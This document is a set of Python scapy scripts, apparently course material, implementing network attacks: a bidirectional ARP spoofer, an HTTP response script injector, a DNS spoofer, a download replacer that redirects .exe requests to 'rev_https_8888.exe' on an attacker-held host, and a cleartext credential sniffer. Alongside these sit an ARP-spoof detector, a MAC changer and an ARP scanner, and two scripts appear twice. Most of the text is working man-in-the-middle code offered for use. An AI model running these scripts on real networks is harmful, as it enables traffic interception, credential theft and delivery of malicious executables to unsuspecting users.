Python Programs
#!/usr/bin/env python
import scapy.all as scapy
import time
import sys
def get_mac(ip):
    """Resolve *ip* to a MAC address with a single broadcast ARP request.

    Sends one ARP who-has for *ip* to ff:ff:ff:ff:ff:ff, waits at most one
    second and returns the ``hwsrc`` of the first reply. The reply is
    unauthenticated -- whoever answers first wins -- so a host that is itself
    spoofing ARP can poison this lookup.

    Raises:
        IndexError: if nobody answered within the timeout.
    """
    who_has = scapy.Ether(dst="ff:ff:ff:ff:ff:ff") / scapy.ARP(pdst=ip)
    answered, _unanswered = scapy.srp(who_has, timeout=1, verbose=False)
    first_reply = answered[0][1]
    return first_reply.hwsrc
def spoof(target_ip, spoof_ip):
    """Send one unsolicited ARP is-at telling *target_ip* that *spoof_ip* is here.

    ``op=2`` is an ARP reply; ``hwsrc`` is not set, so scapy's default for the
    sending interface is used, which is what makes the target send traffic for
    spoof_ip to this host. Resolving the target first means this raises
    IndexError (from get_mac) if the target does not answer ARP.
    """
    target_mac = get_mac(target_ip)
    forged_reply = scapy.ARP(
        op=2,
        pdst=target_ip,
        hwdst=target_mac,
        psrc=spoof_ip,
    )
    scapy.send(forged_reply, verbose=False)
def restore(destination_ip, source_ip):
    """Re-announce the genuine MAC of *source_ip* to *destination_ip*.

    Undoes spoof(): both IPs are resolved live with get_mac, then an ARP
    is-at (op=2) carrying the real ``hwsrc`` is sent four times so the
    destination's cache is corrected even if a frame is lost.

    Raises:
        IndexError: propagated from get_mac when either host does not answer.
    """
    dst_mac = get_mac(destination_ip)
    src_mac = get_mac(source_ip)
    correction = scapy.ARP(
        op=2,
        pdst=destination_ip,
        hwdst=dst_mac,
        psrc=source_ip,
        hwsrc=src_mac,
    )
    scapy.send(correction, count=4, verbose=False)
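# Lab addresses are hard-coded; use only on a network you are authorised to test.
target_ip = "192.168.10.134"
gateway_ip = "192.168.10.2"
try:
    sent_packets_count = 0
    while True:
        # Poison both directions so traffic between target and gateway
        # transits this host.
        spoof(target_ip, gateway_ip)
        spoof(gateway_ip, target_ip)
        sent_packets_count += 2
        # Overwrite the same console line instead of scrolling; write()
        # avoids the Python 2 softspace that a trailing-comma print leaves.
        sys.stdout.write("\r[+] Packets sent: " + str(sent_packets_count))
        sys.stdout.flush()
        time.sleep(2)
except KeyboardInterrupt:
    sys.stdout.write("\n")
    print("[+] Detected CTRL + C ..... Resetting ARP tables...... Please wait.")
finally:
    # Restore on *any* exit, not only Ctrl-C: if a host stops answering ARP,
    # get_mac raises IndexError out of the loop and the original code left
    # both caches poisoned.
    restore(target_ip, gateway_ip)
    restore(gateway_ip, target_ip)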
import scapy.all as scapy
def get_mac(ip):
    """Return the MAC that answers an ARP who-has for *ip* (first reply wins).

    The detector uses this as its notion of the "real" MAC, but the value is
    itself learnt over unauthenticated ARP: a spoofer that answers probes
    faster than the legitimate host poisons this baseline as well.

    Raises:
        IndexError: when no reply arrives within the 1 s timeout.
    """
    query = scapy.ARP(pdst=ip)
    frame = scapy.Ether(dst="ff:ff:ff:ff:ff:ff") / query
    replies = scapy.srp(frame, timeout=1, verbose=False)
    answered = replies[0]
    _sent, received = answered[0]
    return received.hwsrc
def sniff(interface):
    """Capture live on *interface* and hand every frame to process_sniffed_packet.

    ``store=False`` stops scapy from keeping each packet in memory; the call
    blocks until interrupted.
    """
    scapy.sniff(
        iface=interface,
        store=False,
        prn=process_sniffed_packet,
    )
def process_sniffed_packet(packet):
    """Flag ARP replies whose sender MAC disagrees with a fresh ARP lookup.

    For every ARP is-at (op == 2) seen on the wire, the claimed sender IP is
    re-resolved with get_mac and the two MACs compared. Known limits: the
    baseline comes from the same unauthenticated ARP mechanism, so a spoofer
    that also wins the race for the probe reply evades detection; every
    observed reply triggers an outbound probe; and an unanswered probe
    (IndexError) is silently ignored rather than reported.
    """
    if not packet.haslayer(scapy.ARP):
        return
    arp = packet[scapy.ARP]
    if arp.op != 2:
        return
    try:
        expected_mac = get_mac(arp.psrc)
    except IndexError:
        return
    if expected_mac != arp.hwsrc:
        print("[+] You are under attack!!")
# Interface is hard-coded; this call blocks until interrupted.
sniff(interface="eth0")
#! /usr/bin/env python
import netfilterqueue
import scapy.all as scapy
import re
def set_load(packet, load):
    """Replace the TCP payload of *packet* with *load* and return the packet.

    The IP length, IP checksum and TCP checksum are deleted instead of being
    recomputed here so that scapy fills them in when the packet is rebuilt.
    Requires Raw, IP and TCP layers to be present.
    """
    packet[scapy.Raw].load = load
    for layer, field in ((scapy.IP, "len"), (scapy.IP, "chksum"), (scapy.TCP, "chksum")):
        delattr(packet[layer], field)
    return packet
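def process_packet(packet):
    """netfilterqueue callback: inject a script into plaintext HTTP responses.

    Requests to port 80 lose their Accept-Encoding header and are downgraded
    to HTTP/1.0 so the server replies uncompressed and unchunked; responses
    from port 80 get ``injection_code`` inserted before ``</body>`` and their
    Content-Length increased to match. Every packet is accepted (forwarded)
    whether or not it was modified. Only cleartext HTTP is affected; TLS
    traffic is opaque here.
    """
    scapy_packet = scapy.IP(packet.get_payload())
    if scapy_packet.haslayer(scapy.Raw) and scapy_packet.haslayer(scapy.TCP):
        load = scapy_packet[scapy.Raw].load
        tcp = scapy_packet[scapy.TCP]
        if tcp.dport == 80:
            print("[+] Request")
            load = re.sub(r"Accept-Encoding:.*?\r\n", "", load)
            load = load.replace("HTTP/1.1", "HTTP/1.0")
        elif tcp.sport == 80:
            print("[+] Response")
            injection_code = "<script>alert('XSS');</script>"
            load = load.replace("</body>", injection_code + "</body>")
            # \d+ rather than \d*: an empty match would make int() raise
            # inside the callback.
            match = re.search(r"(?:Content-Length:\s)(\d+)", load)
            if match:
                new_length = int(match.group(1)) + len(injection_code)
                # Splice the new value into the matched span only. A plain
                # str.replace(old_value, ...) rewrote the *first* occurrence
                # of those digits anywhere in the payload, e.g. the "200" of
                # "HTTP/1.1 200 OK" when Content-Length happened to be 200.
                load = load[:match.start(1)] + str(new_length) + load[match.end(1):]
        if load != scapy_packet[scapy.Raw].load:
            new_packet = set_load(scapy_packet, load)
            packet.set_payload(str(new_packet))
    packet.accept()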
# Bind to NFQUEUE number 0. Packets only arrive here if a matching netfilter
# rule (presumably iptables ... -j NFQUEUE --queue-num 0, not part of this
# script) diverts them; run() blocks until interrupted.
queue = netfilterqueue.NetfilterQueue()
queue.bind(0, process_packet)
queue.run()
#! /usr/bin/env python
import netfilterqueue
import scapy.all as scapy
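def process_packet(packet):
    """netfilterqueue callback: forge the DNS answer for one hard-coded name.

    Only DNS responses over UDP are candidates (a DNSRR layer must be
    present). When the question name contains ``www.dapthecontract.com`` the
    whole answer section is replaced by a single record resolving it to
    192.168.10.128 and ``ancount`` is set to 1 to match. IP/UDP length and
    checksum fields are deleted so scapy recomputes them on rebuild. Every
    packet, modified or not, is accepted.
    """
    scapy_packet = scapy.IP(packet.get_payload())
    # Guard each layer before indexing it: a response with an empty question
    # section has no DNSQR, and DNS over TCP has no UDP layer. The original
    # indexed both unconditionally; an exception raised inside this callback
    # would most likely leave the packet un-accepted.
    is_candidate = (
        scapy_packet.haslayer(scapy.DNSRR)
        and scapy_packet.haslayer(scapy.DNSQR)
        and scapy_packet.haslayer(scapy.UDP)
    )
    if is_candidate:
        qname = scapy_packet[scapy.DNSQR].qname
        # Substring test: any name that contains this string matches, not
        # only the exact label.
        if "www.dapthecontract.com" in qname:
            print("[+] Spoofing target")
            answer = scapy.DNSRR(rrname=qname, rdata="192.168.10.128")
            scapy_packet[scapy.DNS].an = answer
            scapy_packet[scapy.DNS].ancount = 1
            del scapy_packet[scapy.IP].len
            del scapy_packet[scapy.IP].chksum
            del scapy_packet[scapy.UDP].chksum
            del scapy_packet[scapy.UDP].len
            packet.set_payload(str(scapy_packet))
    packet.accept()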
# Bind to NFQUEUE number 0. Packets only arrive here if a matching netfilter
# rule (presumably iptables ... -j NFQUEUE --queue-num 0, not part of this
# script) diverts them; run() blocks until interrupted.
queue = netfilterqueue.NetfilterQueue()
queue.bind(0, process_packet)
queue.run()
#! /usr/bin/env python
import netfilterqueue
import scapy.all as scapy
# TCP ack numbers of observed .exe requests, consulted when the matching
# response arrives. Entries are only ever appended below, so the list grows
# for the lifetime of the process.
ack_list = []
def set_load(packet, load):
    """Overwrite the Raw payload of *packet* with *load*; return the packet.

    Length and checksum fields that depend on the payload (IP.len,
    IP.chksum, TCP.chksum) are removed so scapy recomputes them when the
    packet is serialised. Raw, IP and TCP layers must all be present.
    """
    raw = packet[scapy.Raw]
    ip_hdr = packet[scapy.IP]
    tcp_hdr = packet[scapy.TCP]
    raw.load = load
    del ip_hdr.len
    del ip_hdr.chksum
    del tcp_hdr.chksum
    return packet
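def process_packet(packet):
    """netfilterqueue callback: redirect plaintext HTTP downloads of .exe files.

    A request to port 80 whose payload contains ".exe" has its TCP ack number
    recorded in ``ack_list``; the response segment from port 80 whose seq
    equals a recorded ack gets its payload replaced by a 301 redirect to
    http://192.168.10.128/rev_https_8888.exe. Every packet is accepted.
    Only cleartext HTTP is affected.
    """
    scapy_packet = scapy.IP(packet.get_payload())
    # Check for TCP before indexing it (as the injector script does): a UDP
    # datagram with a payload would otherwise make the layer lookup raise
    # inside the callback.
    if scapy_packet.haslayer(scapy.Raw) and scapy_packet.haslayer(scapy.TCP):
        tcp = scapy_packet[scapy.TCP]
        if tcp.dport == 80:
            if ".exe" in scapy_packet[scapy.Raw].load:
                print("[+] exe Request")
                ack_list.append(tcp.ack)
        elif tcp.sport == 80:
            if tcp.seq in ack_list:
                # Consume the entry so ack_list does not grow without bound.
                ack_list.remove(tcp.seq)
                print("Replacing file")
                # Bare-LF line endings: relies on the client tolerating LF
                # where HTTP specifies CRLF.
                modified_packet = set_load(scapy_packet, "HTTP/1.1 301 Moved Permanently\nLocation: http://192.168.10.128/rev_https_8888.exe\n\n")
                packet.set_payload(str(modified_packet))
    packet.accept()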
# Bind to NFQUEUE number 0. Packets only arrive here if a matching netfilter
# rule (presumably iptables ... -j NFQUEUE --queue-num 0, not part of this
# script) diverts them; run() blocks until interrupted.
queue = netfilterqueue.NetfilterQueue()
queue.bind(0, process_packet)
queue.run()
#! /usr/bin/env python
import netfilterqueue
import scapy.all as scapy
import re
def set_load(packet, load):
    """Replace the TCP payload of *packet* with *load* and return the packet.

    The IP length, IP checksum and TCP checksum are deleted instead of being
    recomputed here so that scapy fills them in when the packet is rebuilt.
    Requires Raw, IP and TCP layers to be present.
    """
    packet[scapy.Raw].load = load
    for layer, field in ((scapy.IP, "len"), (scapy.IP, "chksum"), (scapy.TCP, "chksum")):
        delattr(packet[layer], field)
    return packet
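def process_packet(packet):
    """netfilterqueue callback: inject a script into plaintext HTTP responses.

    Requests to port 80 lose their Accept-Encoding header and are downgraded
    to HTTP/1.0 so the server replies uncompressed and unchunked; responses
    from port 80 get ``injection_code`` inserted before ``</body>`` and their
    Content-Length increased to match. Every packet is accepted (forwarded)
    whether or not it was modified. Only cleartext HTTP is affected; TLS
    traffic is opaque here.
    """
    scapy_packet = scapy.IP(packet.get_payload())
    if scapy_packet.haslayer(scapy.Raw) and scapy_packet.haslayer(scapy.TCP):
        load = scapy_packet[scapy.Raw].load
        tcp = scapy_packet[scapy.TCP]
        if tcp.dport == 80:
            print("[+] Request")
            load = re.sub(r"Accept-Encoding:.*?\r\n", "", load)
            load = load.replace("HTTP/1.1", "HTTP/1.0")
        elif tcp.sport == 80:
            print("[+] Response")
            injection_code = "<script>alert('XSS');</script>"
            load = load.replace("</body>", injection_code + "</body>")
            # \d+ rather than \d*: an empty match would make int() raise
            # inside the callback.
            match = re.search(r"(?:Content-Length:\s)(\d+)", load)
            if match:
                new_length = int(match.group(1)) + len(injection_code)
                # Splice the new value into the matched span only. A plain
                # str.replace(old_value, ...) rewrote the *first* occurrence
                # of those digits anywhere in the payload, e.g. the "200" of
                # "HTTP/1.1 200 OK" when Content-Length happened to be 200.
                load = load[:match.start(1)] + str(new_length) + load[match.end(1):]
        if load != scapy_packet[scapy.Raw].load:
            new_packet = set_load(scapy_packet, load)
            packet.set_payload(str(new_packet))
    packet.accept()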
# Bind to NFQUEUE number 0. Packets only arrive here if a matching netfilter
# rule (presumably iptables ... -j NFQUEUE --queue-num 0, not part of this
# script) diverts them; run() blocks until interrupted.
queue = netfilterqueue.NetfilterQueue()
queue.bind(0, process_packet)
queue.run()
#! /usr/bin/env python
import netfilterqueue
import scapy.all as scapy
# TCP ack numbers of observed .exe requests, consulted when the matching
# response arrives. Entries are only ever appended below, so the list grows
# for the lifetime of the process.
ack_list = []
def set_load(packet, load):
    """Overwrite the Raw payload of *packet* with *load*; return the packet.

    Length and checksum fields that depend on the payload (IP.len,
    IP.chksum, TCP.chksum) are removed so scapy recomputes them when the
    packet is serialised. Raw, IP and TCP layers must all be present.
    """
    raw = packet[scapy.Raw]
    ip_hdr = packet[scapy.IP]
    tcp_hdr = packet[scapy.TCP]
    raw.load = load
    del ip_hdr.len
    del ip_hdr.chksum
    del tcp_hdr.chksum
    return packet
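def process_packet(packet):
    """netfilterqueue callback: redirect plaintext HTTP downloads of .exe files.

    A request to port 80 whose payload contains ".exe" has its TCP ack number
    recorded in ``ack_list``; the response segment from port 80 whose seq
    equals a recorded ack gets its payload replaced by a 301 redirect to
    http://192.168.10.128/rev_https_8888.exe. Every packet is accepted.
    Only cleartext HTTP is affected.
    """
    scapy_packet = scapy.IP(packet.get_payload())
    # Check for TCP before indexing it (as the injector script does): a UDP
    # datagram with a payload would otherwise make the layer lookup raise
    # inside the callback.
    if scapy_packet.haslayer(scapy.Raw) and scapy_packet.haslayer(scapy.TCP):
        tcp = scapy_packet[scapy.TCP]
        if tcp.dport == 80:
            if ".exe" in scapy_packet[scapy.Raw].load:
                print("[+] exe Request")
                ack_list.append(tcp.ack)
        elif tcp.sport == 80:
            if tcp.seq in ack_list:
                # Consume the entry so ack_list does not grow without bound.
                ack_list.remove(tcp.seq)
                print("Replacing file")
                # Bare-LF line endings: relies on the client tolerating LF
                # where HTTP specifies CRLF.
                modified_packet = set_load(scapy_packet, "HTTP/1.1 301 Moved Permanently\nLocation: http://192.168.10.128/rev_https_8888.exe\n\n")
                packet.set_payload(str(modified_packet))
    packet.accept()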
# Bind to NFQUEUE number 0. Packets only arrive here if a matching netfilter
# rule (presumably iptables ... -j NFQUEUE --queue-num 0, not part of this
# script) diverts them; run() blocks until interrupted.
queue = netfilterqueue.NetfilterQueue()
queue.bind(0, process_packet)
queue.run()
#! /usr/bin/env python
import subprocess
import optparse
import re
def get_arguments():
    """Parse ``-i/--interface`` and ``-m/--mac`` from the command line.

    Returns the optparse options object. Both options are mandatory; a
    missing one aborts through ``parser.error`` (usage text on stderr,
    exit status 2). Values are passed through unvalidated.
    """
    parser = optparse.OptionParser()
    option_specs = (
        ("-i", "--interface", "interface", "Interface to change its MAC address"),
        ("-m", "--mac", "new_mac", "New MAC address"),
    )
    for short_flag, long_flag, dest, help_text in option_specs:
        parser.add_option(short_flag, long_flag, dest=dest, help=help_text)
    options, _positional = parser.parse_args()
    problem = None
    if not options.interface:
        problem = "[-] Please specify an interface, use --help for more info."
    elif not options.new_mac:
        problem = "[-] Please specify a new mac , use --help for more info."
    if problem:
        parser.error(problem)
    return options
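def change_mac(interface, new_mac):
    """Set *interface*'s hardware address to *new_mac* with ifconfig.

    Brings the interface down, applies the address, brings it back up. Each
    command is passed as an argument list (no shell), so the user-supplied
    values cannot smuggle in extra shell commands. *new_mac* is validated
    first because ifconfig would otherwise be invoked with garbage while the
    interface is already down; *interface* is left to ifconfig to reject.
    Exit codes of the three calls are not checked.

    Raises:
        ValueError: if *new_mac* is not six colon-separated hex octets.
    """
    # \A/\Z rather than ^/$ so a trailing newline cannot sneak through.
    if not re.match(r"\A([0-9a-fA-F]{2}:){5}[0-9a-fA-F]{2}\Z", new_mac):
        raise ValueError("[-] Invalid MAC address: " + new_mac)
    print("[+] Changing MAC address for " + interface + " to " + new_mac)
    subprocess.call(["ifconfig", interface, "down"])
    subprocess.call(["ifconfig", interface, "hw", "ether", new_mac])
    subprocess.call(["ifconfig", interface, "up"])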
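def get_current_mac(interface):
    """Return the MAC address ifconfig reports for *interface*, or None.

    Runs ``ifconfig <interface>`` as an argument list (the name is never
    seen by a shell) and returns the first ``xx:xx:xx:xx:xx:xx`` group of
    hex octets in its output. Prints a message and returns None when no such
    group is present.

    Raises:
        subprocess.CalledProcessError: if ifconfig exits non-zero, e.g. for
            an unknown interface.
    """
    ifconfig_result = subprocess.check_output(["ifconfig", interface])
    # check_output yields bytes on Python 3; decode so the str pattern works
    # on either version (on Python 2 this gives unicode, which re accepts).
    text = ifconfig_result.decode("utf-8", "replace")
    # Hex octets only: the previous \w\w pattern also accepted underscores
    # and non-hex letters.
    mac_address_search_result = re.search(r"[0-9a-fA-F]{2}(?::[0-9a-fA-F]{2}){5}", text)
    if mac_address_search_result:
        return mac_address_search_result.group(0)
    print("[-] Could not read MAC address.")
    return None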
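options = get_arguments()
current_mac = get_current_mac(options.interface)
print("Current MAC = " + str(current_mac))
change_mac(options.interface, options.new_mac)
current_mac = get_current_mac(options.interface)
# The address read back may not match the user's input byte-for-byte (the
# tool may print "aa:bb" where the user typed "AA:BB"), and it is None when
# no MAC was found, so normalise case and guard None before comparing.
if current_mac is not None and current_mac.lower() == options.new_mac.lower():
    print("[+] MAC address was successfully changed to " + current_mac)
else:
    print("[-] MAC address did not get changed.")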
#! /usr/bin/env python
import scapy.all as scapy
import argparse
def get_arguments():
    """Parse the mandatory ``-t/--target`` network argument.

    Returns the argparse namespace. When the target is missing,
    ``parser.error`` prints usage and exits with status 2, so the function
    never returns without a target.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument(
        "-t",
        "--target",
        dest="target",
        help="specify network to scan including /mask e.g 192.168.0.1/24",
    )
    options = parser.parse_args()
    if options.target:
        return options
    parser.error("[-] Please specify an network, use --help for more info.")
def scan(ip):
    """ARP-sweep *ip* (a host or a ``/mask`` range) and return who answered.

    Broadcasts a who-has for the address(es) in *ip*, waits one second and
    returns a list of ``{"ip": ..., "MAC": ...}`` dicts built from the
    replies. Silent hosts are simply absent, and the result is only as
    trustworthy as the unauthenticated ARP replies it is built from.
    """
    probe = scapy.Ether(dst="ff:ff:ff:ff:ff:ff") / scapy.ARP(pdst=ip)
    answered = scapy.srp(probe, timeout=1, verbose=False)[0]
    return [
        {"ip": reply.psrc, "MAC": reply.hwsrc}
        for _request, reply in answered
    ]
def print_result(results_list):
    """Print a fixed header, then one ``ip<TAB><TAB>MAC`` row per result dict.

    Each entry must carry ``"ip"`` and ``"MAC"`` keys; an empty list prints
    only the header.
    """
    header = "IP\t\t\tMAC Address\n-------------------------------------------"
    rows = [entry["ip"] + "\t\t" + entry["MAC"] for entry in results_list]
    for line in [header] + rows:
        print(line)
# Script entry: parse the target range, ARP-sweep it, print the table.
options = get_arguments()
scan_result = scan(options.target)
print_result(scan_result)
#! /usr/bin/env python
import scapy.all as scapy
from scapy.layers import http
def sniff(interface):
    """Capture live on *interface* and hand every frame to process_sniffed_packet.

    ``store=False`` stops scapy from keeping each packet in memory; the call
    blocks until interrupted.
    """
    scapy.sniff(
        iface=interface,
        store=False,
        prn=process_sniffed_packet,
    )
def get_url(packet):
    """Return the request's Host header concatenated with its Path (no scheme).

    The packet must carry an HTTPRequest layer.
    """
    request = packet[http.HTTPRequest]
    return request.Host + request.Path
def get_login_info(packet):
    """Return the raw payload if it looks like a credential submission, else None.

    Scans the Raw layer (when present) for a fixed list of field names and
    returns the whole payload on the first hit. The test is a case-sensitive
    substring match, not a form parser, and only cleartext HTTP ever reaches
    this sniffer.
    """
    if not packet.haslayer(scapy.Raw):
        return None
    payload = packet[scapy.Raw].load
    for marker in ("username", "user", "login", "password", "pass"):
        if marker in payload:
            return payload
    return None
def process_sniffed_packet(packet):
    """Print the URL of each cleartext HTTP request and any credential-looking payload.

    Frames without an HTTPRequest layer are ignored (TLS traffic never
    matches). Matched payloads are printed raw to stdout, so the console
    -- and anything capturing it -- ends up holding the captured secrets.
    """
    if not packet.haslayer(http.HTTPRequest):
        return
    print("[+] HTTP Request >> " + get_url(packet))
    credentials = get_login_info(packet)
    if credentials:
        print("\n\n[+] Possible username/password > " + credentials + "\n\n")
# Interface is hard-coded; this call blocks until interrupted.
sniff(interface="eth0")